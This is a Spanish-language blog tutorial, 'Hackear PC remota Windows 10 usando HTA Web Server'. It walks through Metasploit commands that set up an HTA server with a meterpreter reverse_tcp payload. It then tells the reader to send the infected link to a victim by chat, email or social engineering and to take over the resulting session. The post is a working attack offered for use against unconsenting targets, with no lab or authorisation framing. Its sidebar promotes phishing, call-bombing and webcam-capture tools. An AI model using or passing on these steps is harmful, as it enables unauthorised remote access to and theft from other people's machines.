Leyendo

Hackear PC remota Windows 10 usando HTA Web Server

Hacking Windows Metasploit HTA Server

·2 Minutos de lectura

Hackear PC remota Windows 10 usando HTA Web Server

Este módulo aloja una HTML Application (HTA) que, cuando se abre, ejecutará una payload (carga útil) a través de Powershell. Cuando un usuario navega hacia el archivo HTA, Windows te alertará dos veces antes de que se ejecute la carga útil

[eckosc_status_message title=”Nota!” icon=”fa-exclamation-triangle” type=”warn” message=”Este método, de hace algunos años, desgraciadamente funciona con Windows Defender desactivado. Un usuario (Jesus P. M), a través de la fanpage de FB, me pidió el tutorial y aquí está. Un saludo Jesus!.”]

Objetivos de explotación

Windows Todas las versiones
Atacante: Parrot OS (Puedes usar Kali Linux u otra de las 5 mejores distros Linux para pruebas de seguridad)
PC de la víctima: Windows 10

Hacking con HTA Web Server

Abre el terminal e inicia el Metasploit Framework (MSF):

msfconsole

Creamos la payload con los siguientes comandos:

use exploit/windows/misc/hta_server
set lhost <tu_IP>
set srvhost <tu_IP>
set payload windows/meterpreter/reverse_tcp
set lport 8443
exploit

Para conocer tu IP abre una nueva terminal y ejecuta el comando ifconfig.

Lo hecho anteriormente creará un URL con el archivo infeccioso. Envía el enlace del servidor a la víctima por chat o correo electrónico o cualquier técnica de ingeniería social.

Cuando el ordenador víctima navegue hacía tu enlace, descargará un archivo del tipo abcxyz.hta, y cuando la víctima haga clic en él obtendrás la sesión de meterpreter.

Ahora tienes acceso a la PC de las víctimas. Utiliza el comando “sessions -i” y el número de sesión para conectarte a la sesión.

Ver también

Hacking

Hackear Teléfono Android con Backdoor APK

Alexynior·

Recomendaciones similares:

Si te gusta el contenido y deseas apoyar a la mejora del sitio web, considera hacer una contribución ¡haciendo clic aquí por favor!. ¡NO ES OBLIGATORIO, GRACIAS! :’)

¿Te ha gustado este artículo? Sigue este blog en su fanpage de Facebook, Twitter, Instagram y/o YouTube para que no te pierdas del mejor contenido informático y hacking!

Physical2FA: Autenticación de Dos Factores usando USB

PatchChecker: Verificar Vulnerabilidades de PrivEsc Windows

[Revisión] iBoysoft Data Recovery: ¿El mejor software de recuperación de datos para Mac?

EvilNet: Ataque de Red WiFi, VLAN, ARP, MAC

Sifter: Escáner OSINT, Reconocimiento y Vulnerabilidad

AdvPhishing: Herramienta avanzada OTP Phishing!

Cómo Mostrar las Redes WiFi disponibles desde la Terminal

vtop: Monitorear Actividad de Memoria y Procesos Linux

Cómo Borrar Archivos Caché de Programas en Linux

SGN: Polymorphic Binary Encoder for Offensive Security Purposes

PrivescCheck: Enumeración de Escalada de Privilegios para Windows

Cómo establecer longitud mínima de contraseña en Windows 10

Spacedesk: Convertir tu smartphone/tablet en una segunda pantalla de PC

SayCheese: Capturar webcam a través de un enlace

TBomb: Bombardeo de mensajes y llamadas

Cómo Descargar de Mega a Google Drive con Colab

Las Mejores Cartas para Crear Juegos y Actividades Interactivas

[Revisión] Serverspace Servidor VPS: Crea tu Servidor en 1 Minuto

Hackear PC remota Windows 10 usando HTA Web Server

Hacking con HTA Web Server

Hackear Teléfono Android con Backdoor APK

EvilNet: Ataque de Red WiFi, VLAN, ARP, MAC

Sifter: Escáner OSINT, Reconocimiento y Vulnerabilidad

AdvPhishing: Herramienta avanzada OTP Phishing!

EvilNet: Ataque de Red WiFi, VLAN, ARP, MAC

Sifter: Escáner OSINT, Reconocimiento y Vulnerabilidad